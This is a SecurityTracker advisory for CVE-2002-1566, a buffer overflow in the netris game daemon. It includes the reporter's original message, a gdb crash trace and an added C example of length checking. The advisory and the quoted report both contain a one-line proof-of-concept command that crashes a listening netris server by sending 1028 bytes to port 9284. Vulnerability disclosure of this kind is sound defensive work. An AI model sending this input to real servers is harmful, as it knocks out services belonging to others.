SecurityTracker.com
Category:   Application (Game)  >   netris
Vendors:   Weaver, Mark H.
netris Game Buffer Overflow Lets Remote Users Crash the Daemon
SecurityTracker Alert ID:  1007544
SecurityTracker URL:  http://securitytracker.com/id/1007544
CVE Reference:   CVE-2002-1566
Date:  Aug 21 2003
Impact:   Denial of service via network
Fix Available:  Yes  Vendor Confirmed:  Yes  Exploit Included:  Yes  
Version(s): prior to 0.52
Description:   A buffer overflow vulnerability was reported in the netris game. A remote user can cause the game to crash.

It was reported [in September 2002] that when netris is run with the '-w' command line option (i.e., the wait option), a remote user can connect to the target system on TCP port 9284 and send a long string to cause the netris daemon on the target server to crash.

A demonstration exploit command is provided:

perl -e '{print "a"x"1028"}' | telnet localhost 9284

Impact:   A remote user can cause the netris daemon to crash.
Solution:   The vendor has released a fixed version (0.52), available at:

ftp://ftp.netris.org/pub/netris/

Vendor URL:  www.netris.org/
Cause:   Boundary error
Underlying OS:  Linux (Any), UNIX (Any)

Message History:   None.
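
The "Boundary error" cause listed above is the class of bug in which a network daemon uses a peer-supplied length to fill a fixed-size buffer without checking it first. The C code below is an added example, not netris code and not the vendor's 0.52 fix; the 4-byte framing, the 1024-byte buffer and every name in it are assumptions made for illustration. It shows the length validation that prevents such a crash, run against a constructed 1028-byte input like the one in the advisory.

```c
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* Assumed framing for illustration only (not taken from the netris source):
 * 2-byte type, 2-byte big-endian total length (header included), payload. */
#define HDR_LEN     4u
#define PAYLOAD_CAP 1024u   /* hypothetical fixed receive buffer size */

enum pkt_status { PKT_OK = 0, PKT_SHORT, PKT_BAD_LEN, PKT_TOO_LONG, PKT_TRUNCATED };

struct packet {
    uint16_t      type;
    size_t        len;                  /* bytes valid in payload */
    unsigned char payload[PAYLOAD_CAP];
};

/* Parse one frame from in[0..in_len). Every length taken from the wire is
 * validated before it is used as a copy size. */
enum pkt_status parse_packet(const unsigned char *in, size_t in_len,
                             struct packet *out)
{
    if (in_len < HDR_LEN)
        return PKT_SHORT;

    uint16_t type  = (uint16_t)((in[0] << 8) | in[1]);
    size_t   total = ((size_t)in[2] << 8) | in[3];   /* peer-controlled */

    if (total < HDR_LEN)
        return PKT_BAD_LEN;             /* total - HDR_LEN would underflow */
    size_t body = total - HDR_LEN;
    if (body > sizeof out->payload)
        return PKT_TOO_LONG;            /* the check a boundary error omits */
    if (body > in_len - HDR_LEN)
        return PKT_TRUNCATED;           /* claims more than was received */

    memcpy(out->payload, in + HDR_LEN, body);
    out->type = type;
    out->len  = body;
    return PKT_OK;
}

/* Constructed input shaped like the advisory's test: 1028 bytes of 'a'. */
enum pkt_status parse_advisory_input(void)
{
    unsigned char in[1028];
    struct packet p;
    memset(in, 'a', sizeof in);
    return parse_packet(in, sizeof in, &p);
}
```

With this framing the bytes "aa" in the length field decode to 0x6161, so the frame is rejected as too long before any copy takes place.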


 Source Message Contents

Subject:  netris-0.5.




Hi.

I found a remote bug in the latest version of netris (0.5)..

(apocalypse:~)% gdb netris
GNU gdb 4.18 (FreeBSD)
[..]
(gdb) r -w
Starting program: /usr/local/bin/netris -w
(no debugging symbols found)...(no debugging symbols found)...


***
on second terminal:
(apocalypse:~)% perl -e '{print "a"x"1028"}' | telnet localhost 9284
***

Your opponent is using an old, incompatible version
of Netris.  They should get the latest version.
(no debugging symbols found)...
Program received signal SIGSEGV, Segmentation fault.
0x28138fd5 in getenv () from /usr/lib/libc.so.4


Exploit code is still under development.. ;)

Sorry for my terrible English.

best regards,
-- 
* Artur Byszko * \x62\x61\x6a\x6b\x65\x72\x6f *


Copyright 2019, SecurityGlobal.net LLC